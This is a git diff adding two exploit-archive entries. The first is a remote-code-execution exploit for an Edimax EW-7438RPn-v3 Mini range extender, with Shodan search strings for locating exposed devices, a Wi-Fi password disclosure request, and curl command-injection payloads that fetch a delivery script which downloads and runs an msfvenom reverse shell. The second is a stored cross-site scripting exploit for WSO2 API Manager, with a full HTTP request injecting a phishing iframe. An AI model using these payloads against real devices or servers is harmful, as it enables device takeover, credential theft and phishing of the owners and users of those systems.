diff --git a/exploits/hardware/webapps/48318.txt b/exploits/hardware/webapps/48318.txt new file mode 100644 index 000000000..c9731d595 --- /dev/null +++ b/exploits/hardware/webapps/48318.txt @@ -0,0 +1,42 @@ +# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution +# Date: 2020-04-13 +# Exploit Author: Wadeek +# Hardware Version: EW-7438RPn-v3 Mini +# Firmware Version: 1.23 / 1.27 +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip + +== Shodan Dorks == + +(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp" +(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234" + +== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) == + +GET /wizard_reboot.asp +showSSID = ""; +document.write(''+""+''); + +== Command Execution * == + +(Setup Mode) +curl 'http:///goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +(Unsetup Mode with default password) +curl 'http:///goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +== Cross-Site Request Forgery -> Command Execution * == + +
+ + +
+ +* [ delivery.sh ] +-------------------------------------------------------------------------------------- +# (msfvenom) linux/mipsbe/shell/reverse_tcp +cd /tmp/ +busybox wget -O reverse http:///reverse +busybox chmod +x reverse +./reverse & +-------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/java/webapps/48319.txt b/exploits/java/webapps/48319.txt new file mode 100644 index 000000000..8aa2b6577 --- /dev/null +++ b/exploits/java/webapps/48319.txt @@ -0,0 +1,142 @@ +# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting +# Date: 2020-04-13 +# Author: raki ben hamouda +# Vendor: https://apim.docs.wso2.com +# Softwrare link: https://apim.docs.wso2.com/en/latest/ +# CVE: N/A +# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700 + +Technical Details & Description: +================================ +A remote Stored Cross Site Scripting has been discovered in WSO2 API +Manager Ressource Browser component). +The security vulnerability allows a remote attacker With access to the +component "Ressource Browser" +to inject a malicious code in Add Comment Feature. + +The vulnerability is triggered after sending a POST request to +`/carbon/info/comment-ajaxprocessor.jsp` with Parameter +"comment=targeted&path=%2F". +Remote attackers has the ablility to spread a malware,to Hijack a session +(a session with Higher privileges), or to initiate phishing attacks. + +The security risk of the Stored XSS web vulnerability is estimated as +medium with a cvss (common vulnerability scoring system) count of 5.4 +Exploitation of the Stored XSS web vulnerability requires a low privilege +web-application user account and medium or high user interaction. +Successful exploitation of the vulnerability results in Compromising the +server . + + +Request Method: +[+] POST + +Module: +[+] /carbon/info/comment-ajaxprocessor.jsp + +Parameters: +[+] comment=admincomment +[+] path=%2F +======================================= + +POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1 +Host: 192.168.149.1:9443 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/ +X-Requested-With: XMLHttpRequest, XMLHttpRequest +X-Prototype-Version: 1.5.0 +Content-type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH +Content-Length: 64 +Cookie: region3_registry_menu=visible; region3_metadata_menu=none; +wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; +JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; +requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; +region4_monitor_menu=none; region5_tools_menu=none; +current-breadcrumb=registry_menu%252Cresource_browser_menu%2523 +Connection: close + +comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F + + + + + +============================== + + + +HTTP/1.1 200 + +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: DENY +vary: accept-encoding +Content-Type: text/html;charset=UTF-8 +Content-Language: en-US +Date: Tue, 31 Dec 2019 10:50:00 GMT +Connection: close +Server: WSO2 Carbon Server +Content-Length: 3144 + + +//the body of response includes attacker malicious script + + +  + + +